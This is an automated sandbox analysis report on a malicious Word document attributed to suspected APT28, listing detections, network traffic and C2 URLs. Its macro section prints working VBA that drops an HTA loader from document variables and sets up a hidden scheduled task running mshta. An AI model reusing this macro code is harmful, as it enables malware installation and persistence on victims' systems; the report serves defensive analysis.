Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RoYAd85faz.doc

Overview

General Information

Sample name:RoYAd85faz.doc
renamed because original name is a hash value
Original sample name:ab5685ebf439f61c554977df1e1cd0c3.doc
Analysis ID:1590274
MD5:ab5685ebf439f61c554977df1e1cd0c3
SHA1:715724904dfb62a68887fa3d2d6d391b32cbd7b1
SHA256:fd78051817b5e2375c92d14588f9a4ba1adc92cc1564e55e6150ae350ed6c889
Tags:docUAC-0063user-smica83
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected landing page (webpage, office document or email)
Document contains an embedded VBA macro which accesses itself as a binary file (likely for evasion)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)
Document contains embedded VBA macros
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Yara signature match

Classification

Process Tree

  • System is w11x64_office
  • WINWORD.EXE (PID: 7920 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • WINWORD.EXE (PID: 7680 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • mshta.exe (PID: 5828 cmdline: "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Lookup\Dispatch MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
settings.xmlapt_susp_apt28_uac0063_malicious_doc_settings_xmlDetects some suspected APT28 document settings.xmlSekoia.io
  • 0x3663:$: Call svc.GetFolder(
  • 0x31a1:$: CreateTextFile(appdir

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Lookup\Dispatchapt_susp_apt28_uac0063_hta_loaderDetects some suspected APT28 HTA loaderSekoia.io
  • 0x0:$: <HEAD><HTA:APPLICATION ID
  • 0xf3:$: script Language="VBScript.Encode

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2895883202.0000027C804F0000.00000004.00000800.00020000.00000000.sdmpapt_susp_apt28_uac0063_hta_loaderDetects some suspected APT28 HTA loaderSekoia.io
  • 0x0:$: <HEAD><HTA:APPLICATION ID
  • 0xf3:$: script Language="VBScript.Encode
Process Memory Space: mshta.exe PID: 5828apt_susp_apt28_uac0063_hta_loaderDetects some suspected APT28 HTA loaderSekoia.io
  • 0x84:$: <HEAD><HTA:APPLICATION ID
  • 0x177:$: script Language="VBScript.Encode

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-13T21:38:36.141852+010020577421A Network Trojan was detected104.21.84.17480192.168.2.2649712TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: RoYAd85faz.docAvira: detected
Multi AV Scanner detection for submitted file
Source: RoYAd85faz.docVirustotal: Detection: 43%Perma Link
Source: RoYAd85faz.docReversingLabs: Detection: 34%
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\~WRD0000.tmpJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\~WRD0001.tmpJoe Sandbox ML: detected
Machine Learning detection for sample
Source: RoYAd85faz.docJoe Sandbox ML: detected

Phishing

barindex
AI detected landing page (webpage, office document or email)
Source: Screenshot id: 18Joe Sandbox AI: Page contains button: 'Download' Source: 'Screenshot id: 18'
Source: Screenshot id: 18Joe Sandbox AI: Screenshot id: 18 contains prominent button: 'download'
Source: Screenshot id: 17Joe Sandbox AI: Page contains button: 'Download' Source: 'Screenshot id: 17'
Source: Screenshot id: 17Joe Sandbox AI: Screenshot id: 17 contains prominent button: 'download'
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: global trafficDNS query: name: lookup.ink
Source: global trafficDNS query: name: browser.events.data.msn.cn
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global trafficTCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:62334
Source: global trafficTCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:62334
Source: global trafficTCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:62334
Source: global trafficTCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2057742 - Severity 1 - ET MALWARE TA426/Zebrocy Hatvibe CnC Server Response M1 : 104.21.84.174:80 -> 192.168.2.26:49712
Source: global trafficTCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: lookup.ink
Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.cn
Source: mshta.exe, 00000009.00000003.2581750842.0000027C81A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.in
Source: mshta.exe, 00000009.00000002.2898991106.0000027C81A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/
Source: mshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2317903271.0000027C81A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/lookup.php
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/lookup.php-
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/lookup.php-B
Source: mshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/lookup.phpC
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/lookup.phpH
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/lookup.phpN
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/lookup.phpV
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/lookup.phpc
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/lookup.phpy
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2901755666.0000027C83475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2898991106.0000027C81A2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2898991106.0000027C81A27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2581783335.0000027C81A2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.php
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.php$/
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.php-11CE-8C82-00AA004BA90B
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.php=8
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.phpA
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.phpL
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.phpMp
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.phpOnly
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.phpj
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.phps
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.ink/match.phpy
Source: mshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookup.inktT
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: settings.xml, type: SAMPLEMatched rule: Detects some suspected APT28 document settings.xml Author: Sekoia.io
Source: 00000009.00000002.2895883202.0000027C804F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: Process Memory Space: mshta.exe PID: 5828, type: MEMORYSTRMatched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Lookup\Dispatch, type: DROPPEDMatched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Document contains an embedded VBA macro with suspicious strings
Source: RoYAd85faz.docOLE, VBA macro line: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") & "\" & ActiveDocument.Name & ".doc"
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String environ: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") & "\" & ActiveDocument.Name & ".doc"Name: documeNt_opEn
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Lookup\Dispatch": Call svc.GetFolder("\").RegisterTaskDefinition("Lookup\Dispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Lookup\Dispatch": Call svc.GetFolder("\").RegisterTaskDefinition("Lookup\Dispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Lookup\Dispatch": Call svc.GetFolder("\").RegisterTaskDefinition("Lookup\Dispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Lookup": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\Dispatch", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Lookup": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\Dispatch", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Lookup": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\Dispatch", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String ThisDocument
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Source: RoYAd85faz.docStream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, environ
Source: ~WRD0000.tmp.0.drStream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, environ
Source: ~WRD0001.tmp.7.drStream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, environ
Office process queries suspicious COM object (likely to drop second stage)
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: RoYAd85faz.docOLE, VBA macro line: Sub documeNt_opEn()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function documeNt_opEnName: documeNt_opEn
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Set doc2 = JbxHook_Open_1__ob_set(14, objApp.Documents, namedoc)
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Sub documeNt_opEn()
Source: ~WRD0000.tmp.7.drOLE, VBA macro line: Sub docUment_oPen()::: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block1ergegdr"):: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block2ergegdr"):: goods: baads: Me.Close: End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub docUment_oPen()::: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block1ergegdr"):: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block2ergegdr"):: goods: baads: Me.Close: End Sub
Source: RoYAd85faz.docOLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.drOLE indicator, VBA macros: true
Source: ~WRD0000.tmp.7.drOLE indicator, VBA macros: true
Source: ~WRD0001.tmp.7.drOLE indicator, VBA macros: true
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: settings.xml, type: SAMPLEMatched rule: apt_susp_apt28_uac0063_malicious_doc_settings_xml author = Sekoia.io, description = Detects some suspected APT28 document settings.xml, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = fd104985-6441-4fb6-8cc1-30afa4a7797b, hash = 0272acc6ed17c72320e4e7b0f5d449841d0ccab4ea89f48fd69d0a292cc5d39a
Source: 00000009.00000002.2895883202.0000027C804F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: Process Memory Space: mshta.exe PID: 5828, type: MEMORYSTRMatched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: C:\Users\user\AppData\Local\Lookup\Dispatch, type: DROPPEDMatched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: classification engineClassification label: mal100.expl.evad.winDOC@5/12@2/1
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$YAd85faz.docJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{254984DD-A5F0-483A-BC8C-8C5E3D2132AD} - OProcSessId.datJump to behavior
Source: RoYAd85faz.docOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.7.drOLE indicator, Word Document stream: true
Source: ~WRD0001.tmp.7.drOLE indicator, Word Document stream: true
Source: RoYAd85faz.docOLE document summary: title field not present or empty
Source: RoYAd85faz.docOLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.drOLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.7.drOLE document summary: title field not present or empty
Source: ~WRD0000.tmp.7.drOLE document summary: edited time not present or 0
Source: ~WRD0001.tmp.7.drOLE document summary: title field not present or empty
Source: ~WRD0001.tmp.7.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: RoYAd85faz.docVirustotal: Detection: 43%
Source: RoYAd85faz.docReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Lookup\Dispatch
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: virtdisk.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: directxdatabasehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
